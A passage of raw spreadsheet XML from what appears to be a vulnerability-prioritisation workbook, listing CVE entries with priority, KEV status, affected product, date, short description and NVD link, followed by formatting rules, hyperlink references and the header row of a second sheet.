t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t></is></c></row><row r="1694"><c r="A1694" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1694" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1694" s="5" t="inlineStr"><is><t>CVE-2026-87886</t></is></c><c r="D1694" s="5" t="inlineStr" /><c r="E1694" s="5" t="inlineStr" /><c r="F1694" s="5" t="inlineStr" /><c r="G1694" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1694" s="5" t="inlineStr" /><c r="I1694" s="5" t="inlineStr" /><c r="J1694" s="5" t="inlineStr" /><c r="K1694" s="5" t="inlineStr"><is><t>acronis:backup</t></is></c><c r="L1694" s="5" t="inlineStr" /><c r="M1694" s="5" t="inlineStr" /><c r="N1694" s="5" t="inlineStr"><is><t>KEV</t></is></c><c r="O1694" s="5" t="inlineStr" /><c r="P1694" s="5" t="inlineStr" /><c r="Q1694" s="5" t="inlineStr"><is><t>2026-09-19</t></is></c><c r="R1694" s="5" t="inlineStr" /><c r="S1694" s="5" t="inlineStr"><is><t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t></is></c><c r="T1694" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t></is></c></row></sheetData><autoFilter ref="A1:T1694" /><conditionalFormatting sqref="E2:E1694"><cfRule type="cellIs" priority="1" operator="equal" dxfId="0"><formula>"CRITICAL"</formula></cfRule><cfRule type="cellIs" priority="2" operator="equal" dxfId="1"><formula>"HIGH"</formula></cfRule><cfRule type="cellIs" priority="3" operator="equal" dxfId="2"><formula>"MEDIUM"</formula></cfRule><cfRule type="cellIs" priority="4" operator="equal" dxfId="3"><formula>"LOW"</formula></cfRule></conditionalFormatting><conditionalFormatting sqref="G2:G1694"><cfRule type="cellIs" priority="5" operator="equal" dxfId="4"><formula>"Yes"</formula></cfRule></conditionalFormatting><hyperlinks><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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1465" r:id="rId1464" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1466" r:id="rId1465" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1467" r:id="rId1466" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1468" r:id="rId1467" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1469" r:id="rId1468" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1470" r:id="rId1469" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1471" r:id="rId1470" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1472" r:id="rId1471" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1473" r:id="rId1472" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1474" r:id="rId1473" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1475" r:id="rId1474" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1476" r:id="rId1475" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1477" r:id="rId1476" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1478" r:id="rId1477" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1479" r:id="rId1478" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1480" r:id="rId1479" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1481" r:id="rId1480" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1482" r:id="rId1481" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1483" r:id="rId1482" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1484" r:id="rId1483" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1485" r:id="rId1484" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1486" r:id="rId1485" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1487" r:id="rId1486" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1488" r:id="rId1487" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1489" r:id="rId1488" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1490" r:id="rId1489" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1491" r:id="rId1490" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1492" r:id="rId1491" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1493" r:id="rId1492" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1494" r:id="rId1493" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1495" r:id="rId1494" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1496" r:id="rId1495" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1497" r:id="rId1496" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1498" r:id="rId1497" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1499" r:id="rId1498" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1500" r:id="rId1499" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1501" r:id="rId1500" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1502" r:id="rId1501" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1503" r:id="rId1502" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1504" r:id="rId1503" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1505" r:id="rId1504" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1506" r:id="rId1505" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1507" r:id="rId1506" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1508" r:id="rId1507" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1509" r:id="rId1508" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1510" r:id="rId1509" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1511" r:id="rId1510" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1512" r:id="rId1511" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1513" r:id="rId1512" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1514" r:id="rId1513" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1515" r:id="rId1514" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1516" r:id="rId1515" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1517" r:id="rId1516" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1518" r:id="rId1517" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1519" r:id="rId1518" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1520" r:id="rId1519" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1521" r:id="rId1520" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1522" r:id="rId1521" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1523" r:id="rId1522" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1524" r:id="rId1523" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1525" r:id="rId1524" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1526" r:id="rId1525" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1527" r:id="rId1526" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1528" r:id="rId1527" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1529" r:id="rId1528" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1530" r:id="rId1529" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1531" r:id="rId1530" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1532" r:id="rId1531" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1533" r:id="rId1532" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1534" r:id="rId1533" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1535" r:id="rId1534" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1536" r:id="rId1535" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1537" r:id="rId1536" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1538" r:id="rId1537" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1539" r:id="rId1538" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1540" r:id="rId1539" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1541" r:id="rId1540" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1542" r:id="rId1541" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1543" r:id="rId1542" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1544" r:id="rId1543" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1545" r:id="rId1544" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1546" r:id="rId1545" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1547" r:id="rId1546" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1548" r:id="rId1547" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1549" r:id="rId1548" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1550" r:id="rId1549" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1551" r:id="rId1550" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1552" r:id="rId1551" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1553" r:id="rId1552" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1554" r:id="rId1553" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1555" r:id="rId1554" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1556" r:id="rId1555" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1557" r:id="rId1556" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1558" r:id="rId1557" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1559" r:id="rId1558" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1560" r:id="rId1559" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1561" r:id="rId1560" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1562" r:id="rId1561" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1563" r:id="rId1562" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1564" r:id="rId1563" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1565" r:id="rId1564" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1566" r:id="rId1565" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1567" r:id="rId1566" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1568" r:id="rId1567" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1569" r:id="rId1568" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1570" r:id="rId1569" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1571" r:id="rId1570" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1572" r:id="rId1571" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1573" r:id="rId1572" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1574" r:id="rId1573" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1575" r:id="rId1574" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1576" r:id="rId1575" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1577" r:id="rId1576" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1578" r:id="rId1577" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1579" r:id="rId1578" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1580" r:id="rId1579" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1581" r:id="rId1580" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1582" r:id="rId1581" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1583" r:id="rId1582" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1584" r:id="rId1583" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1585" r:id="rId1584" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1586" r:id="rId1585" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1587" r:id="rId1586" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1588" r:id="rId1587" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1589" r:id="rId1588" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1590" r:id="rId1589" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1591" r:id="rId1590" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1592" r:id="rId1591" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1593" r:id="rId1592" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1594" r:id="rId1593" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1595" r:id="rId1594" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1596" r:id="rId1595" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1597" r:id="rId1596" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1598" r:id="rId1597" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1599" r:id="rId1598" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1600" r:id="rId1599" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1601" r:id="rId1600" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1602" r:id="rId1601" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1603" r:id="rId1602" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1604" r:id="rId1603" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1605" r:id="rId1604" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1606" r:id="rId1605" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1607" r:id="rId1606" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1608" r:id="rId1607" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1609" r:id="rId1608" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1610" r:id="rId1609" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1611" r:id="rId1610" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1612" r:id="rId1611" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1613" r:id="rId1612" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1614" r:id="rId1613" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1615" r:id="rId1614" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1616" r:id="rId1615" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1617" r:id="rId1616" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1618" r:id="rId1617" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1619" r:id="rId1618" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1620" r:id="rId1619" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1621" r:id="rId1620" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1622" r:id="rId1621" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1623" r:id="rId1622" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1624" r:id="rId1623" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1625" r:id="rId1624" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1626" r:id="rId1625" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1627" r:id="rId1626" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1628" r:id="rId1627" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1629" r:id="rId1628" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1630" r:id="rId1629" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1631" r:id="rId1630" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1632" r:id="rId1631" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1633" r:id="rId1632" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1634" r:id="rId1633" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1635" r:id="rId1634" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1636" r:id="rId1635" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1637" r:id="rId1636" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1638" r:id="rId1637" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1639" r:id="rId1638" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1640" r:id="rId1639" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1641" r:id="rId1640" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1642" r:id="rId1641" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1643" r:id="rId1642" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1644" r:id="rId1643" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1645" r:id="rId1644" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1646" r:id="rId1645" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1647" r:id="rId1646" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1648" r:id="rId1647" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1649" r:id="rId1648" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1650" r:id="rId1649" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1651" r:id="rId1650" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1652" r:id="rId1651" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1653" r:id="rId1652" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1654" r:id="rId1653" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1655" r:id="rId1654" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1656" r:id="rId1655" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1657" r:id="rId1656" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1658" r:id="rId1657" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1659" r:id="rId1658" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1660" r:id="rId1659" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1661" r:id="rId1660" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1662" r:id="rId1661" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1663" r:id="rId1662" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1664" r:id="rId1663" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1665" r:id="rId1664" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1666" r:id="rId1665" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1667" r:id="rId1666" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1668" r:id="rId1667" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1669" r:id="rId1668" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1670" r:id="rId1669" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1671" r:id="rId1670" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1672" r:id="rId1671" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1673" r:id="rId1672" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1674" r:id="rId1673" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1675" r:id="rId1674" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1676" r:id="rId1675" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1677" r:id="rId1676" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1678" r:id="rId1677" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1679" r:id="rId1678" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1680" r:id="rId1679" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1681" r:id="rId1680" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1682" r:id="rId1681" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1683" r:id="rId1682" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1684" r:id="rId1683" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1685" r:id="rId1684" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1686" r:id="rId1685" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1687" r:id="rId1686" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1688" r:id="rId1687" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1689" r:id="rId1688" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1690" r:id="rId1689" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1691" r:id="rId1690" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1692" r:id="rId1691" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1693" r:id="rId1692" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1694" r:id="rId1693" /></hyperlinks><pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5" /></worksheet>
</file>

<file path=xl/worksheets/sheet3.xml><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetPr><outlinePr summaryBelow="1" summaryRight="1" /><pageSetUpPr /></sheetPr><dimension ref="A1:T1679" /><sheetViews><sheetView workbookViewId="0"><pane xSplit="3" ySplit="1" topLeftCell="D2" activePane="bottomRight" state="frozen" /><selection pane="topRight" /><selection pane="bottomLeft" /><selection pane="bottomRight" activeCell="A1" sqref="A1" /></sheetView></sheetViews><sheetFormatPr baseColWidth="8" defaultRowHeight="15" /><cols><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sheetData><row r="1"><c r="A1" s="4" t="inlineStr"><is><t>Priority</t></is></c><c r="B1" s="4" t="inlineStr"><is><t>Reason</t></is></c><c r="C1" s="4" t="inlineStr"><is><t>ID</t></is></c><c r="D1" s="4" t="inlineStr"><is><t>CVSS</t></is></c><c r="E1" s="4" t="inlineStr"><is><t>Severity</t></is></c><c r="F1" s="4" t="inlineStr"><is><t>Score src</t></is></c><c r="G1" s="4" t="inlineStr"><is><t>KEV</t></is></c><c r="H1" s="4" t="inlineStr"><is><t>EPSS</t></is></c><c r="I1" s="4" 